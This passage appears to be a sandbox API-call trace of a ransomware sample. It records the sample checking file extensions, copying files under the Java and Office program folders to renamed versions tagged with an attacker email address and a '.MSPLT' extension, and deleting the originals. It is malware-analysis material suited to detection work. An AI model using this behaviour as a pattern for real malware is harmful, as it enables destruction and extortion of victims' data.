lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.874] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.874] lstrlenW (lpString=".zip") returned 4 [0314.874] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.875] lstrlenW (lpString=".rar") returned 4 [0314.875] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.875] lstrlenW (lpString=".bz2") returned 4 [0314.875] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.875] lstrlenW (lpString=".7z") returned 3 [0314.875] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.875] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.875] lstrlenW (lpString=".dbf") returned 4 [0314.875] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.875] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.875] lstrlenW (lpString=".1cd") returned 4 [0314.875] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.875] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 68 [0314.875] lstrlenW (lpString=".jpg") returned 4 [0314.875] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.875] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0314.876] lstrlenW (lpString="sound.properties") returned 16 [0314.876] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.876] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=1210) returned 1 [0314.877] CloseHandle (hObject=0x540) returned 1 [0314.877] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties")) returned 0x20 [0314.877] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.877] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.878] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.878] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.878] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0314.879] GetLastError () returned 0x0 [0314.879] ReadFile (in: hFile=0x540, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x4ba, lpOverlapped=0x0) returned 1 [0314.903] WriteFile (in: hFile=0x53c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x4c0, lpOverlapped=0x0) returned 1 [0314.904] ReadFile (in: hFile=0x540, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.904] WriteFile (in: hFile=0x53c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xf4, lpOverlapped=0x0) returned 1 [0314.904] SetEndOfFile (hFile=0x53c) returned 1 [0314.905] CloseHandle (hObject=0x53c) returned 1 [0314.905] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.905] SetEndOfFile (hFile=0x540) returned 1 [0314.909] CloseHandle (hObject=0x540) returned 1 [0314.910] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.910] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties")) returned 1 [0314.911] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.911] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.911] lstrlenW (lpString=".doc") returned 4 [0314.911] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0314.911] lstrlenW (lpString=".docx") returned 5 [0314.911] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0314.911] lstrlenW (lpString=".pdf") returned 4 [0314.911] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0314.911] lstrlenW (lpString=".xls") returned 4 [0314.911] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0314.911] lstrlenW (lpString=".xlsx") returned 5 [0314.911] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0314.912] lstrlenW (lpString=".ppt") returned 4 [0314.912] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0314.912] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.912] lstrlenW (lpString=".zip") returned 4 [0314.912] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0314.912] lstrlenW (lpString=".rar") returned 4 [0314.912] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0314.912] lstrlenW (lpString=".bz2") returned 4 [0314.912] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0314.912] lstrlenW (lpString=".7z") returned 3 [0314.912] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0314.912] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.912] lstrlenW (lpString=".dbf") returned 4 [0314.912] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0314.912] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.912] lstrlenW (lpString=".1cd") returned 4 [0314.912] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0314.912] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.912] lstrlenW (lpString=".jpg") returned 4 [0314.912] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0314.913] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.913] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.913] lstrlenW (lpString=".doc") returned 4 [0314.913] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0314.913] lstrlenW (lpString=".docx") returned 5 [0314.913] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0314.913] lstrlenW (lpString=".pdf") returned 4 [0314.913] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0314.913] lstrlenW (lpString=".xls") returned 4 [0314.913] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0314.913] lstrlenW (lpString=".xlsx") returned 5 [0314.913] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0314.913] lstrlenW (lpString=".ppt") returned 4 [0314.913] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0314.913] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.913] lstrlenW (lpString=".zip") returned 4 [0314.913] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0314.913] lstrlenW (lpString=".rar") returned 4 [0314.913] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0314.913] lstrlenW (lpString=".bz2") returned 4 [0314.913] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0314.913] lstrlenW (lpString=".7z") returned 3 [0314.914] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0314.914] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.914] lstrlenW (lpString=".dbf") returned 4 [0314.914] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0314.914] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.914] lstrlenW (lpString=".1cd") returned 4 [0314.914] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0314.914] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 55 [0314.914] lstrlenW (lpString=".jpg") returned 4 [0314.914] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0314.914] lstrcmpiW (lpString1=".0_144\\lib\\tzmappings", lpString2=".MSPLT") returned -1 [0314.914] lstrlenW (lpString="tzmappings") returned 10 [0314.915] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.915] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=8400) returned 1 [0314.916] CloseHandle (hObject=0x540) returned 1 [0314.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings")) returned 0x20 [0314.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.916] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.917] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.917] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.917] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0314.918] GetLastError () returned 0x0 [0314.918] ReadFile (in: hFile=0x540, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x20d0, lpOverlapped=0x0) returned 1 [0314.921] WriteFile (in: hFile=0x53c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x20e0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x20e0, lpOverlapped=0x0) returned 1 [0314.923] ReadFile (in: hFile=0x540, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.923] WriteFile (in: hFile=0x53c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xe8, lpOverlapped=0x0) returned 1 [0314.923] SetEndOfFile (hFile=0x53c) returned 1 [0314.923] CloseHandle (hObject=0x53c) returned 1 [0314.923] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.924] SetEndOfFile (hFile=0x540) returned 1 [0314.931] CloseHandle (hObject=0x540) returned 1 [0314.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.932] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings")) returned 1 [0314.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.934] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.934] lstrlenW (lpString=".doc") returned 4 [0314.934] lstrcmpiW (lpString1=".doc", lpString2="ings") returned -1 [0314.934] lstrlenW (lpString=".docx") returned 5 [0314.934] lstrcmpiW (lpString1=".docx", lpString2="pings") returned -1 [0314.934] lstrlenW (lpString=".pdf") returned 4 [0314.934] lstrcmpiW (lpString1=".pdf", lpString2="ings") returned -1 [0314.934] lstrlenW (lpString=".xls") returned 4 [0314.934] lstrcmpiW (lpString1=".xls", lpString2="ings") returned -1 [0314.935] lstrlenW (lpString=".xlsx") returned 5 [0314.935] lstrcmpiW (lpString1=".xlsx", lpString2="pings") returned -1 [0314.935] lstrlenW (lpString=".ppt") returned 4 [0314.935] lstrcmpiW (lpString1=".ppt", lpString2="ings") returned -1 [0314.935] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.935] lstrlenW (lpString=".zip") returned 4 [0314.935] lstrcmpiW (lpString1=".zip", lpString2="ings") returned -1 [0314.935] lstrlenW (lpString=".rar") returned 4 [0314.935] lstrcmpiW (lpString1=".rar", lpString2="ings") returned -1 [0314.935] lstrlenW (lpString=".bz2") returned 4 [0314.935] lstrcmpiW (lpString1=".bz2", lpString2="ings") returned -1 [0314.935] lstrlenW (lpString=".7z") returned 3 [0314.935] lstrcmpiW (lpString1=".7z", lpString2="ngs") returned -1 [0314.936] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.936] lstrlenW (lpString=".dbf") returned 4 [0314.936] lstrcmpiW (lpString1=".dbf", lpString2="ings") returned -1 [0314.936] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.936] lstrlenW (lpString=".1cd") returned 4 [0314.936] lstrcmpiW (lpString1=".1cd", lpString2="ings") returned -1 [0314.936] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.936] lstrlenW (lpString=".jpg") returned 4 [0314.936] lstrcmpiW (lpString1=".jpg", lpString2="ings") returned -1 [0314.936] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.936] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.936] lstrlenW (lpString=".doc") returned 4 [0314.936] lstrcmpiW (lpString1=".doc", lpString2="ings") returned -1 [0314.936] lstrlenW (lpString=".docx") returned 5 [0314.936] lstrcmpiW (lpString1=".docx", lpString2="pings") returned -1 [0314.936] lstrlenW (lpString=".pdf") returned 4 [0314.936] lstrcmpiW (lpString1=".pdf", lpString2="ings") returned -1 [0314.936] lstrlenW (lpString=".xls") returned 4 [0314.937] lstrcmpiW (lpString1=".xls", lpString2="ings") returned -1 [0314.937] lstrlenW (lpString=".xlsx") returned 5 [0314.937] lstrcmpiW (lpString1=".xlsx", lpString2="pings") returned -1 [0314.937] lstrlenW (lpString=".ppt") returned 4 [0314.937] lstrcmpiW (lpString1=".ppt", lpString2="ings") returned -1 [0314.937] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.937] lstrlenW (lpString=".zip") returned 4 [0314.937] lstrcmpiW (lpString1=".zip", lpString2="ings") returned -1 [0314.937] lstrlenW (lpString=".rar") returned 4 [0314.937] lstrcmpiW (lpString1=".rar", lpString2="ings") returned -1 [0314.937] lstrlenW (lpString=".bz2") returned 4 [0314.937] lstrcmpiW (lpString1=".bz2", lpString2="ings") returned -1 [0314.937] lstrlenW (lpString=".7z") returned 3 [0314.937] lstrcmpiW (lpString1=".7z", lpString2="ngs") returned -1 [0314.937] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.937] lstrlenW (lpString=".dbf") returned 4 [0314.937] lstrcmpiW (lpString1=".dbf", lpString2="ings") returned -1 [0314.937] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.937] lstrlenW (lpString=".1cd") returned 4 [0314.938] lstrcmpiW (lpString1=".1cd", lpString2="ings") returned -1 [0314.938] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings") returned 49 [0314.938] lstrlenW (lpString=".jpg") returned 4 [0314.938] lstrcmpiW (lpString1=".jpg", lpString2="ings") returned -1 [0314.938] lstrcmpiW (lpString1=".0_144\\LICENSE", lpString2=".MSPLT") returned -1 [0314.938] lstrlenW (lpString="LICENSE") returned 7 [0314.938] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.939] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=40) returned 1 [0314.939] CloseHandle (hObject=0x540) returned 1 [0314.939] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license")) returned 0x20 [0314.939] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.940] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.940] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.940] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.940] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0314.941] GetLastError () returned 0x0 [0314.941] ReadFile (in: hFile=0x540, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x28, lpOverlapped=0x0) returned 1 [0315.109] WriteFile (in: hFile=0x53c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x30, lpOverlapped=0x0) returned 1 [0315.112] ReadFile (in: hFile=0x540, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0315.112] WriteFile (in: hFile=0x53c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xe2, lpOverlapped=0x0) returned 1 [0315.112] SetEndOfFile (hFile=0x53c) returned 1 [0315.113] CloseHandle (hObject=0x53c) returned 1 [0315.113] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0315.113] SetEndOfFile (hFile=0x540) returned 1 [0315.122] CloseHandle (hObject=0x540) returned 1 [0315.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0315.206] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license")) returned 1 [0315.207] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.207] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.207] lstrlenW (lpString=".doc") returned 4 [0315.208] lstrcmpiW (lpString1=".doc", lpString2="ENSE") returned -1 [0315.208] lstrlenW (lpString=".docx") returned 5 [0315.208] lstrcmpiW (lpString1=".docx", lpString2="CENSE") returned -1 [0315.208] lstrlenW (lpString=".pdf") returned 4 [0315.208] lstrcmpiW (lpString1=".pdf", lpString2="ENSE") returned -1 [0315.208] lstrlenW (lpString=".xls") returned 4 [0315.208] lstrcmpiW (lpString1=".xls", lpString2="ENSE") returned -1 [0315.208] lstrlenW (lpString=".xlsx") returned 5 [0315.208] lstrcmpiW (lpString1=".xlsx", lpString2="CENSE") returned -1 [0315.208] lstrlenW (lpString=".ppt") returned 4 [0315.208] lstrcmpiW (lpString1=".ppt", lpString2="ENSE") returned -1 [0315.208] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.208] lstrlenW (lpString=".zip") returned 4 [0315.208] lstrcmpiW (lpString1=".zip", lpString2="ENSE") returned -1 [0315.208] lstrlenW (lpString=".rar") returned 4 [0315.208] lstrcmpiW (lpString1=".rar", lpString2="ENSE") returned -1 [0315.208] lstrlenW (lpString=".bz2") returned 4 [0315.208] lstrcmpiW (lpString1=".bz2", lpString2="ENSE") returned -1 [0315.208] lstrlenW (lpString=".7z") returned 3 [0315.209] lstrcmpiW (lpString1=".7z", lpString2="NSE") returned -1 [0315.209] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.209] lstrlenW (lpString=".dbf") returned 4 [0315.209] lstrcmpiW (lpString1=".dbf", lpString2="ENSE") returned -1 [0315.209] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.209] lstrlenW (lpString=".1cd") returned 4 [0315.209] lstrcmpiW (lpString1=".1cd", lpString2="ENSE") returned -1 [0315.209] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.209] lstrlenW (lpString=".jpg") returned 4 [0315.209] lstrcmpiW (lpString1=".jpg", lpString2="ENSE") returned -1 [0315.209] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.209] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.209] lstrlenW (lpString=".doc") returned 4 [0315.209] lstrcmpiW (lpString1=".doc", lpString2="ENSE") returned -1 [0315.209] lstrlenW (lpString=".docx") returned 5 [0315.209] lstrcmpiW (lpString1=".docx", lpString2="CENSE") returned -1 [0315.209] lstrlenW (lpString=".pdf") returned 4 [0315.209] lstrcmpiW (lpString1=".pdf", lpString2="ENSE") returned -1 [0315.209] lstrlenW (lpString=".xls") returned 4 [0315.210] lstrcmpiW (lpString1=".xls", lpString2="ENSE") returned -1 [0315.210] lstrlenW (lpString=".xlsx") returned 5 [0315.210] lstrcmpiW (lpString1=".xlsx", lpString2="CENSE") returned -1 [0315.210] lstrlenW (lpString=".ppt") returned 4 [0315.210] lstrcmpiW (lpString1=".ppt", lpString2="ENSE") returned -1 [0315.210] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.210] lstrlenW (lpString=".zip") returned 4 [0315.210] lstrcmpiW (lpString1=".zip", lpString2="ENSE") returned -1 [0315.210] lstrlenW (lpString=".rar") returned 4 [0315.210] lstrcmpiW (lpString1=".rar", lpString2="ENSE") returned -1 [0315.210] lstrlenW (lpString=".bz2") returned 4 [0315.210] lstrcmpiW (lpString1=".bz2", lpString2="ENSE") returned -1 [0315.210] lstrlenW (lpString=".7z") returned 3 [0315.210] lstrcmpiW (lpString1=".7z", lpString2="NSE") returned -1 [0315.210] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.210] lstrlenW (lpString=".dbf") returned 4 [0315.210] lstrcmpiW (lpString1=".dbf", lpString2="ENSE") returned -1 [0315.210] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.210] lstrlenW (lpString=".1cd") returned 4 [0315.210] lstrcmpiW (lpString1=".1cd", lpString2="ENSE") returned -1 [0315.210] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 42 [0315.211] lstrlenW (lpString=".jpg") returned 4 [0315.211] lstrcmpiW (lpString1=".jpg", lpString2="ENSE") returned -1 [0315.211] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0315.211] lstrlenW (lpString="api-ms-win-core-localization-l1-2-0.dll") returned 39 [0315.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0315.254] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=21184) returned 1 [0315.254] CloseHandle (hObject=0x51c) returned 1 [0315.254] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll")) returned 0x220 [0315.328] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 